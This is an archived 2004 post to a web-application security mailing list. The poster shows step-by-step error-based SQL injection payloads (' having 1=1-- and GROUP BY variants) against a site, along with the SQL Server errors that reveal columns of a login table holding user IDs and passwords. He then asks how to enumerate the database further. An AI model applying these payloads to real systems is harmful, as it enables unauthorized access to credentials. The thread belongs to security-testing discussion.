WebApp Sec mailing list archives
Enumerating databases...
From: KrK <krk41 () yahoo com>
Date: Sun, 19 Sep 2004 11:29:09 -0700 (PDT)
Hi List,
I have been doing testing of a web site and have
found all the errors as detailed in the advanced
sql injection paper by ngsoftware and in Hacme
bank.
I have been stuck on the way because of a
different error and am unable to
enumerate the database further. Here is the list
of tests that i have done
and the corresponding output, if anyone could
suggest on how to enumerate
the rest of the table fields it would be great.
step 1: userid='%20having%201%3d1%2d%2d
(encoded form of ' having 1=1--)
result 1:
Column 'logindetls.userid' is invalid in the
select list because it is not
contained in an aggregate function and there is
no GROUP BY clause.
step
2:'%20GROUP%20BY%20logindetls.userid%20having%201=1--
result 2:
Column 'logindetls.password' is invalid in the
select list because it is not
contained in either an aggregate function or the
GROUP BY clause.
step
3:userid='%20GROUP%20BY%20logindetls.userid,logindetls.password%20having%201
=1--
result 3:
Column 'logindetls.name' is invalid in the
select
list because it is not
contained in either an aggregate function or the
GROUP BY clause.
and so on and so forth until i reach a point
where i get this error:
[Microsoft][ODBC SQL Server Driver][SQL
Server]:the text, ntext, and image data types
cannot be compared or sorted,
except when using IS NULL or LIKE operator
The application, i feel, stores text data in one of
the fields which results in the generation of this
error.Has anyone in the list come across this? any
clues on how to enumerate the database further?
Thanking you,
Krk
=====
" DON'T WORRY BE HAPPY,
EVERY NIGHT YOU HAVE SOME TROUBLE,
IF YOU WORRY YOU MAKE IT DOUBLE,
SO DON'T WORRY BE HAPPY NOW...."
__________________________________
Do you Yahoo!?
Yahoo! Mail - 50x more storage than other providers!
http://promotions.yahoo.com/new_mail
Current thread:
- Enumerating databases... KrK (Sep 21)